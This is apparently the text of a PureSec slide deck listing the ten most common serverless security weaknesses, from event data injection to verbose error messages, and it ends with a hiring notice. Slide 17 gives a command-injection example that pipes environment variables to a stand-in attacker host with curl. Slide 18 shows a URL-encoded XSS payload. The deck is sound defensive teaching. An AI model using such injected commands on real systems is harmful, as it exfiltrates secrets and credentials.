  • 15. Serverless Security Top 10 Guide Research by PureSec, together with: https://www.puresec.io/resource-download
  • 16. Serverless Security Top 10 Most Common Weaknesses
  • 17. SAS-1: Function Event Data Injection 17 The serverless-angle: • Many types of event triggers, means many types of input formats, and many entry points • Traditional protections such as WAF are incapable of inspecting non- HTTP event trigger data Occurs when untrusted input is passed directly to an interpreter and eventually gets executed or evaluated In a nutshell: foobar@some.site; env | curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector
  • 18. SAS-1: More Examples 18 Send messages via a RESTful API MySQLDump via Email Curl "https://../send/sms?message=foo%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E"
  • 19. SAS-2: Broken Authentication 19 The serverless-angle: • Serverless promotes Nano-Services  many digital properties to enforce authentication on • Serverless functions may expose unnecessary entry points • Some functions may be triggered by less secure cloud services • IoT device authentication can sometimes be tricky to implement A weak authentication implementation might enable an attacker to bypass application logic and manipulate its flow In a nutshell: Example: API gateway enforces auth., but an S3 bucket with public access, serves as another ”rogue” entry point (triggering a Lambda)
  • 20. SAS-3: Insecure Serverless Deployment Configuration 20 The serverless-angle: • Unauthenticated (public) cloud storage access • Unauthenticated Web-to-Function access • Unencrypted storage (secrets, DBs, file storage) • Complex & tedious IAM permissions and roles • Multiple versions of the same function Cloud and serverless vendors in particular, offer many customizations and configuration settings, some of which have critical security implications. Defaults != the most secure In a nutshell:
  • 21. SAS-4: Over Privileged Function Permissions & Roles 21 The Least Privileged concept, helps reduce the “blast radius” in case something goes wrong. The serverless-angle: • Functions should only be given permission required to properly perform their task • Serverless promotes nano-services architecture, which means a complex roles & permissions model to manage • When functions receive over-permissive rights, each function becomes a potential attack target, and can be leveraged for lateral movement In a nutshell:
  • 22. SAS-5: Inadequate Function Monitoring & Logging 22 The serverless-angle: • Serverless functions execute in the cloud, and are “ephemeral” • Traditional “on premise” or host-based security monitoring solutions irrelevant. Event monitoring tools & procedures are inapt • Existing logging facilities provided by cloud vendors are not always good enough, or disregarded by teams unfamiliar with such capabilities • Every cyber “intrusion kill chain” usually commences with a reconnaissance phase • A key element in most successful major breaches was the lack of real-time incident response, which was caused by failure to detect early signals of an attack In a nutshell: ?
  • 23. SAS-6: Insecure 3rd Party Dependencies 23 The serverless-angle: • Serverless functions are usually compact and focused. This means that developers must import 3rd party logic from (potentially) untrusted sources • Vulnerable packages • Packages with “shady” intents Even the most secure application will become vulnerable when introduced with vulnerable 3rd party dependencies In a nutshell:
  • 24. SAS-7: Insecure Application Secrets Storage 24 The serverless-angle: • Serverless functions are oftentimes stateless. This means that in order to persist data, developers are required to use environment variables or insecure configuration files • Storing secrets securely, requires using a key management system, which not every developer is accustomed to, especially in cloud environments Storing sensitive data, encryption keys or other types of application secrets, in an insecure fashion, can lead to data leakage In a nutshell:
  • 25. SAS-8: Denial of Service & Denial of Wallet 25 The serverless-angle: • Poor design & coding, can easily turn a simple serverless function into a DoS target – especially when such functions expose public APIs • Application layer DoS (e.g. ReDoS or Billion-Laughs-Attack) becomes the most prominent weakness to worry about • Traditional IP-based request throttling or blacklisting are irrelevant in many scenarios • Instead of denying other users from service (DoS), attackers can attempt to cause excessive usage, and inflict a financial penalty on the victim company (Denial of Wallet) • During the past decade, we have seen a dramatic increase in the frequency and volume of Denial of Service (DoS) attacks – largest attack seen was 1 Tbps! • While serverless architectures bring a promise of automated scalability and high availability, they do impose some limitations and issues which require attention In a nutshell:
  • 26. SAS-9: Function Execution Flow Manipulation 26 The serverless-angle: • In some serverless apps, each functions may use a chain of invocation. the order of invocation might be critical for achieving the desired logic • Design might assume that certain functions are only invoked under specific scenarios and only by authorized invokers • AWS Step Functions, Azure Logic Apps and Durable Functions (serverless state machines) • Manipulation of application flow may help attackers to subvert application logic • Attackers can eventually bypass access controls, elevate user privileges or even mount a Denial of Service attack In a nutshell:
  • 27. SAS-10: Verbose Error Messages & Exceptions 27 The serverless-angle: • Since many developers are making their first steps in serverless, there is a tendency to: • Use over-verbose error messages • Enable debugging environment variables and eventually forget to clean the code when moving it to the production environment • Raise your hand if you never used debug printing! • Available options for performing line-by-line debugging of serverless based applications is rather limited In a nutshell:
  • 28. We Are Hiring! VP Product Management Software Development Team Lead Email us: careers@puresec.io